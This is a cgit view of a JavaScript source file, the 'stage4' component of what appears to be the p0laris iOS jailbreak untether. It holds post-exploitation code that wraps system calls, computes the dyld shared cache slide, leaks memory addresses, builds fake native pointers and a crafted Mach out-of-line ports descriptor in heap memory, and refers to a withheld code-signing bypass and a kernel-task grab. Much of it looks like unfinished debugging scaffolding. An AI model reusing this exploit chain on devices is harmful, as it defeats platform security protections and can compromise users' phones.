summaryrefslogtreecommitdiff
path: root/src/stage4/main.js
blob: 7e7978605a4ed20384c1aa78d4150be965026eb7 (plain) 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83

var socket = scall_wrapper("socket");
var htons = scall_wrapper("htons");
var inet_addr = scall_wrapper("inet_addr");
var dup2 = scall_wrapper("dup2");
var bind = scall_wrapper("bind");
var listen = scall_wrapper("listen");
var accept = scall_wrapper("accept");
var close = scall_wrapper("close");
var printf = scall_wrapper("printf");
var reboot = scall_wrapper("reboot");
var AF_INET = 2;
var SOCK_DGRAM = 2;
var SOCK_DGRAM = 2;
var IPPROTO_UDP = 17;
var UNSLID_BASE = 0x4000;

function prep_shit() {
	string_ref = scall("JSStringCreateWithUTF8CString", "victim");
	global_object = scall("JSContextGetGlobalObject", read_u32(slid + reserve_addr + 0x44));
	jsobj_addr = scall("JSObjectGetProperty", read_u32(slid + reserve_addr + 0x44), global_object, string_ref, NULL);
	large_buf_ptr = leak_vec(large_buf);
}

function csbypass_wrapper() {
	if (csbypass == undefined) {
		p0laris_log("[*] you're probably running a public build of the untether. i don't have permission to distribute this code yet. sorry.");
		return;
	} else {
		csbypass();
	}
}

function csbypass_stage4() {
	csbypass_wrapper();

	return 0;
}

function main() {
	syslog(LOG_SYSLOG, "__p0laris_LOG_START__");
	p0laris_log("[*] we out here");
	p0laris_log("[*] landed in stage4");

	p0laris_log("[*] p0laris.dyld_shc_slide=0x%08x\n", p0laris.dyld_shc_slide);
	p0laris_log("[*] p0laris.racoon_slide=0x%08x\n", p0laris.racoon_slide);

//	printf = p0laris_log;

	printf("test");

	var dyld_shc_slide = get_dyld_shc_slide();

	sym_cache["JSStringCreateWithUTF8CString"] = JSStringCreateWithUTF8CString + dyld_shc_slide;
	sym_cache["JSObjectGetProperty"] = JSObjectGetProperty + dyld_shc_slide;
	sym_cache["JSContextGetGlobalObject"] = JSContextGetGlobalObject + dyld_shc_slide;
	prep_shit();

	var np = new native_ptr(UNSLID_BASE + (get_our_slide() << 12));
	var native_ptr_u16 = native_ptr_type(2, u8x2_to_u16, u16_to_u8x2);
	var native_ptr_u32 = native_ptr_type(4, u8x4_to_u32, u32_to_u8x4);
	var native_ptr_u16_2 = native_ptr_type(2, u8x2_to_u16, u16_to_u8x2);

	var np1 = new native_ptr_u16(UNSLID_BASE + (get_our_slide() << 12));
	var np2 = new native_ptr_u32(UNSLID_BASE + (get_our_slide() << 12));
	var np3 = new native_ptr_u16_2(UNSLID_BASE + (get_our_slide() << 12));

	var addy = shit_heap(12);
	var np4 = new mach_msg_ool_ports_descriptor_t(addy);
	write_u32(addy, 0x41414141);
	write_u32(addy + 4, 0x42424242);
	write_u32(addy + 8, ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24)));
	p0laris_log("%s", JSON.stringify(np4.deref()));

//	p0laris_log("%s", Proxy.toString());
	p0laris_log("%x %x %x %x", np1.deref(), np2.deref(), np3.deref());

//	reboot();

//	var tfp0 = get_kernel_task();

	syslog(LOG_SYSLOG, "__p0laris_LOG_END__");
	return 0;
}
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 20:05:51 +0000